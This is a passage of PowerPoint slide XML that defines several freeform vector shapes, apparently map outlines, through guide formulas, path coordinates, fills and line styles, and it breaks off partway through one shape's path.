                  <a:gd name="T34" fmla="*/ 50 w 82"/>
                  <a:gd name="T35" fmla="*/ 60 h 69"/>
                  <a:gd name="T36" fmla="*/ 39 w 82"/>
                  <a:gd name="T37" fmla="*/ 66 h 69"/>
                  <a:gd name="T38" fmla="*/ 32 w 82"/>
                  <a:gd name="T39" fmla="*/ 69 h 69"/>
                  <a:gd name="T40" fmla="*/ 29 w 82"/>
                  <a:gd name="T41" fmla="*/ 66 h 69"/>
                  <a:gd name="T42" fmla="*/ 23 w 82"/>
                  <a:gd name="T43" fmla="*/ 67 h 69"/>
                  <a:gd name="T44" fmla="*/ 20 w 82"/>
                  <a:gd name="T45" fmla="*/ 67 h 69"/>
                  <a:gd name="T46" fmla="*/ 20 w 82"/>
                  <a:gd name="T47" fmla="*/ 64 h 69"/>
                  <a:gd name="T48" fmla="*/ 21 w 82"/>
                  <a:gd name="T49" fmla="*/ 60 h 69"/>
                  <a:gd name="T50" fmla="*/ 17 w 82"/>
                  <a:gd name="T51" fmla="*/ 58 h 69"/>
                  <a:gd name="T52" fmla="*/ 11 w 82"/>
                  <a:gd name="T53" fmla="*/ 60 h 69"/>
                  <a:gd name="T54" fmla="*/ 5 w 82"/>
                  <a:gd name="T55" fmla="*/ 42 h 69"/>
                  <a:gd name="T56" fmla="*/ 5 w 82"/>
                  <a:gd name="T57" fmla="*/ 37 h 69"/>
                  <a:gd name="T58" fmla="*/ 0 w 82"/>
                  <a:gd name="T59" fmla="*/ 27 h 69"/>
                  <a:gd name="T60" fmla="*/ 0 w 82"/>
                  <a:gd name="T61" fmla="*/ 19 h 69"/>
                  <a:gd name="T62" fmla="*/ 8 w 82"/>
                  <a:gd name="T63" fmla="*/ 8 h 69"/>
                  <a:gd name="T64" fmla="*/ 14 w 82"/>
                  <a:gd name="T65" fmla="*/ 4 h 69"/>
                  <a:gd name="T66" fmla="*/ 28 w 82"/>
                  <a:gd name="T67" fmla="*/ 4 h 69"/>
                  <a:gd name="T68" fmla="*/ 36 w 82"/>
                  <a:gd name="T69" fmla="*/ 4 h 69"/>
                  <a:gd name="T70" fmla="*/ 43 w 82"/>
                  <a:gd name="T71" fmla="*/ 6 h 69"/>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82"/>
                  <a:gd name="T109" fmla="*/ 0 h 69"/>
                  <a:gd name="T110" fmla="*/ 82 w 82"/>
                  <a:gd name="T111" fmla="*/ 69 h 69"/>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82" h="69">
                    <a:moveTo>
                      <a:pt x="43" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36332" name="Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4363" y="2710"/>
                <a:ext cx="82" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 82"/>
                  <a:gd name="T1" fmla="*/ 8 h 69"/>
                  <a:gd name="T2" fmla="*/ 55 w 82"/>
                  <a:gd name="T3" fmla="*/ 10 h 69"/>
                  <a:gd name="T4" fmla="*/ 60 w 82"/>
                  <a:gd name="T5" fmla="*/ 11 h 69"/>
                  <a:gd name="T6" fmla="*/ 60 w 82"/>
                  <a:gd name="T7" fmla="*/ 8 h 69"/>
                  <a:gd name="T8" fmla="*/ 58 w 82"/>
                  <a:gd name="T9" fmla="*/ 4 h 69"/>
                  <a:gd name="T10" fmla="*/ 64 w 82"/>
                  <a:gd name="T11" fmla="*/ 1 h 69"/>
                  <a:gd name="T12" fmla="*/ 70 w 82"/>
                  <a:gd name="T13" fmla="*/ 5 h 69"/>
                  <a:gd name="T14" fmla="*/ 79 w 82"/>
                  <a:gd name="T15" fmla="*/ 1 h 69"/>
                  <a:gd name="T16" fmla="*/ 79 w 82"/>
                  <a:gd name="T17" fmla="*/ 7 h 69"/>
                  <a:gd name="T18" fmla="*/ 82 w 82"/>
                  <a:gd name="T19" fmla="*/ 19 h 69"/>
                  <a:gd name="T20" fmla="*/ 81 w 82"/>
                  <a:gd name="T21" fmla="*/ 25 h 69"/>
                  <a:gd name="T22" fmla="*/ 80 w 82"/>
                  <a:gd name="T23" fmla="*/ 36 h 69"/>
                  <a:gd name="T24" fmla="*/ 73 w 82"/>
                  <a:gd name="T25" fmla="*/ 40 h 69"/>
                  <a:gd name="T26" fmla="*/ 63 w 82"/>
                  <a:gd name="T27" fmla="*/ 45 h 69"/>
                  <a:gd name="T28" fmla="*/ 54 w 82"/>
                  <a:gd name="T29" fmla="*/ 52 h 69"/>
                  <a:gd name="T30" fmla="*/ 60 w 82"/>
                  <a:gd name="T31" fmla="*/ 58 h 69"/>
                  <a:gd name="T32" fmla="*/ 59 w 82"/>
                  <a:gd name="T33" fmla="*/ 62 h 69"/>
                  <a:gd name="T34" fmla="*/ 50 w 82"/>
                  <a:gd name="T35" fmla="*/ 60 h 69"/>
                  <a:gd name="T36" fmla="*/ 39 w 82"/>
                  <a:gd name="T37" fmla="*/ 66 h 69"/>
                  <a:gd name="T38" fmla="*/ 32 w 82"/>
                  <a:gd name="T39" fmla="*/ 69 h 69"/>
                  <a:gd name="T40" fmla="*/ 29 w 82"/>
                  <a:gd name="T41" fmla="*/ 66 h 69"/>
                  <a:gd name="T42" fmla="*/ 23 w 82"/>
                  <a:gd name="T43" fmla="*/ 67 h 69"/>
                  <a:gd name="T44" fmla="*/ 20 w 82"/>
                  <a:gd name="T45" fmla="*/ 67 h 69"/>
                  <a:gd name="T46" fmla="*/ 20 w 82"/>
                  <a:gd name="T47" fmla="*/ 64 h 69"/>
                  <a:gd name="T48" fmla="*/ 21 w 82"/>
                  <a:gd name="T49" fmla="*/ 60 h 69"/>
                  <a:gd name="T50" fmla="*/ 17 w 82"/>
                  <a:gd name="T51" fmla="*/ 58 h 69"/>
                  <a:gd name="T52" fmla="*/ 11 w 82"/>
                  <a:gd name="T53" fmla="*/ 60 h 69"/>
                  <a:gd name="T54" fmla="*/ 5 w 82"/>
                  <a:gd name="T55" fmla="*/ 42 h 69"/>
                  <a:gd name="T56" fmla="*/ 5 w 82"/>
                  <a:gd name="T57" fmla="*/ 37 h 69"/>
                  <a:gd name="T58" fmla="*/ 0 w 82"/>
                  <a:gd name="T59" fmla="*/ 27 h 69"/>
                  <a:gd name="T60" fmla="*/ 0 w 82"/>
                  <a:gd name="T61" fmla="*/ 19 h 69"/>
                  <a:gd name="T62" fmla="*/ 8 w 82"/>
                  <a:gd name="T63" fmla="*/ 8 h 69"/>
                  <a:gd name="T64" fmla="*/ 14 w 82"/>
                  <a:gd name="T65" fmla="*/ 4 h 69"/>
                  <a:gd name="T66" fmla="*/ 28 w 82"/>
                  <a:gd name="T67" fmla="*/ 4 h 69"/>
                  <a:gd name="T68" fmla="*/ 36 w 82"/>
                  <a:gd name="T69" fmla="*/ 4 h 69"/>
                  <a:gd name="T70" fmla="*/ 43 w 82"/>
                  <a:gd name="T71" fmla="*/ 6 h 69"/>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82"/>
                  <a:gd name="T109" fmla="*/ 0 h 69"/>
                  <a:gd name="T110" fmla="*/ 82 w 82"/>
                  <a:gd name="T111" fmla="*/ 69 h 69"/>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82" h="69">
                    <a:moveTo>
                      <a:pt x="43" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36333" name="Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4326" y="2577"/>
                <a:ext cx="118" cy="144"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 86 w 118"/>
                  <a:gd name="T1" fmla="*/ 134 h 144"/>
                  <a:gd name="T2" fmla="*/ 87 w 118"/>
                  <a:gd name="T3" fmla="*/ 124 h 144"/>
                  <a:gd name="T4" fmla="*/ 83 w 118"/>
                  <a:gd name="T5" fmla="*/ 115 h 144"/>
                  <a:gd name="T6" fmla="*/ 74 w 118"/>
                  <a:gd name="T7" fmla="*/ 102 h 144"/>
                  <a:gd name="T8" fmla="*/ 72 w 118"/>
                  <a:gd name="T9" fmla="*/ 88 h 144"/>
                  <a:gd name="T10" fmla="*/ 64 w 118"/>
                  <a:gd name="T11" fmla="*/ 78 h 144"/>
                  <a:gd name="T12" fmla="*/ 62 w 118"/>
                  <a:gd name="T13" fmla="*/ 72 h 144"/>
                  <a:gd name="T14" fmla="*/ 54 w 118"/>
                  <a:gd name="T15" fmla="*/ 69 h 144"/>
                  <a:gd name="T16" fmla="*/ 49 w 118"/>
                  <a:gd name="T17" fmla="*/ 73 h 144"/>
                  <a:gd name="T18" fmla="*/ 44 w 118"/>
                  <a:gd name="T19" fmla="*/ 79 h 144"/>
                  <a:gd name="T20" fmla="*/ 38 w 118"/>
                  <a:gd name="T21" fmla="*/ 77 h 144"/>
                  <a:gd name="T22" fmla="*/ 29 w 118"/>
                  <a:gd name="T23" fmla="*/ 75 h 144"/>
                  <a:gd name="T24" fmla="*/ 18 w 118"/>
                  <a:gd name="T25" fmla="*/ 87 h 144"/>
                  <a:gd name="T26" fmla="*/ 14 w 118"/>
                  <a:gd name="T27" fmla="*/ 83 h 144"/>
                  <a:gd name="T28" fmla="*/ 15 w 118"/>
                  <a:gd name="T29" fmla="*/ 76 h 144"/>
                  <a:gd name="T30" fmla="*/ 19 w 118"/>
                  <a:gd name="T31" fmla="*/ 62 h 144"/>
                  <a:gd name="T32" fmla="*/ 17 w 118"/>
                  <a:gd name="T33" fmla="*/ 51 h 144"/>
                  <a:gd name="T34" fmla="*/ 11 w 118"/>
                  <a:gd name="T35" fmla="*/ 53 h 144"/>
                  <a:gd name="T36" fmla="*/ 6 w 118"/>
                  <a:gd name="T37" fmla="*/ 51 h 144"/>
                  <a:gd name="T38" fmla="*/ 7 w 118"/>
                  <a:gd name="T39" fmla="*/ 43 h 144"/>
                  <a:gd name="T40" fmla="*/ 6 w 118"/>
                  <a:gd name="T41" fmla="*/ 38 h 144"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 35 h 144"/>
                  <a:gd name="T44" fmla="*/ 5 w 118"/>
                  <a:gd name="T45" fmla="*/ 31 h 144"/>
                  <a:gd name="T46" fmla="*/ 12 w 118"/>
                  <a:gd name="T47" fmla="*/ 22 h 144"/>
                  <a:gd name="T48" fmla="*/ 17 w 118"/>
                  <a:gd name="T49" fmla="*/ 20 h 144"/>
                  <a:gd name="T50" fmla="*/ 25 w 118"/>
                  <a:gd name="T51" fmla="*/ 23 h 144"/>
                  <a:gd name="T52" fmla="*/ 28 w 118"/>
                  <a:gd name="T53" fmla="*/ 18 h 144"/>
                  <a:gd name="T54" fmla="*/ 25 w 118"/>
                  <a:gd name="T55" fmla="*/ 11 h 144"/>
                  <a:gd name="T56" fmla="*/ 24 w 118"/>
                  <a:gd name="T57" fmla="*/ 4 h 144"/>
                  <a:gd name="T58" fmla="*/ 31 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 144"/>
                  <a:gd name="T60" fmla="*/ 39 w 118"/>
                  <a:gd name="T61" fmla="*/ 10 h 144"/>
                  <a:gd name="T62" fmla="*/ 45 w 118"/>
                  <a:gd name="T63" fmla="*/ 22 h 144"/>
                  <a:gd name="T64" fmla="*/ 51 w 118"/>
                  <a:gd name="T65" fmla="*/ 31 h 144"/>
                  <a:gd name="T66" fmla="*/ 57 w 118"/>
                  <a:gd name="T67" fmla="*/ 32 h 144"/>
                  <a:gd name="T68" fmla="*/ 63 w 118"/>
                  <a:gd name="T69" fmla="*/ 27 h 144"/>
                  <a:gd name="T70" fmla="*/ 68 w 118"/>
                  <a:gd name="T71" fmla="*/ 32 h 144"/>
                  <a:gd name="T72" fmla="*/ 75 w 118"/>
                  <a:gd name="T73" fmla="*/ 44 h 144"/>
                  <a:gd name="T74" fmla="*/ 71 w 118"/>
                  <a:gd name="T75" fmla="*/ 48 h 144"/>
                  <a:gd name="T76" fmla="*/ 65 w 118"/>
                  <a:gd name="T77" fmla="*/ 47 h 144"/>
                  <a:gd name="T78" fmla="*/ 61 w 118"/>
                  <a:gd name="T79" fmla="*/ 51 h 144"/>
                  <a:gd name="T80" fmla="*/ 63 w 118"/>
                  <a:gd name="T81" fmla="*/ 56 h 144"/>
                  <a:gd name="T82" fmla="*/ 76 w 118"/>
                  <a:gd name="T83" fmla="*/ 65 h 144"/>
                  <a:gd name="T84" fmla="*/ 86 w 118"/>
                  <a:gd name="T85" fmla="*/ 75 h 144"/>
                  <a:gd name="T86" fmla="*/ 102 w 118"/>
                  <a:gd name="T87" fmla="*/ 98 h 144"/>
                  <a:gd name="T88" fmla="*/ 110 w 118"/>
                  <a:gd name="T89" fmla="*/ 105 h 144"/>
                  <a:gd name="T90" fmla="*/ 114 w 118"/>
                  <a:gd name="T91" fmla="*/ 110 h 144"/>
                  <a:gd name="T92" fmla="*/ 113 w 118"/>
                  <a:gd name="T93" fmla="*/ 115 h 144"/>
                  <a:gd name="T94" fmla="*/ 118 w 118"/>
                  <a:gd name="T95" fmla="*/ 122 h 144"/>
                  <a:gd name="T96" fmla="*/ 117 w 118"/>
                  <a:gd name="T97" fmla="*/ 133 h 144"/>
                  <a:gd name="T98" fmla="*/ 109 w 118"/>
                  <a:gd name="T99" fmla="*/ 137 h 144"/>
                  <a:gd name="T100" fmla="*/ 104 w 118"/>
                  <a:gd name="T101" fmla="*/ 135 h 144"/>
                  <a:gd name="T102" fmla="*/ 97 w 118"/>
                  <a:gd name="T103" fmla="*/ 135 h 144"/>
                  <a:gd name="T104" fmla="*/ 95 w 118"/>
                  <a:gd name="T105" fmla="*/ 139 h 144"/>
                  <a:gd name="T106" fmla="*/ 97 w 118"/>
                  <a:gd name="T107" fmla="*/ 142 h 144"/>
                  <a:gd name="T108" fmla="*/ 95 w 118"/>
                  <a:gd name="T109" fmla="*/ 144 h 144"/>
                  <a:gd name="T110" fmla="*/ 89 w 118"/>
                  <a:gd name="T111" fmla="*/ 142 h 144"/>
                  <a:gd name="T112" fmla="*/ 80 w 118"/>
                  <a:gd name="T113" fmla="*/ 139 h 144"/>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18"/>
                  <a:gd name="T172" fmla="*/ 0 h 144"/>
                  <a:gd name="T173" fmla="*/ 118 w 118"/>
                  <a:gd name="T174" fmla="*/ 144 h 144"/>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18" h="144">
                    <a:moveTo>
                      <a:pt x="80" y="139"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="86" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="49"/>
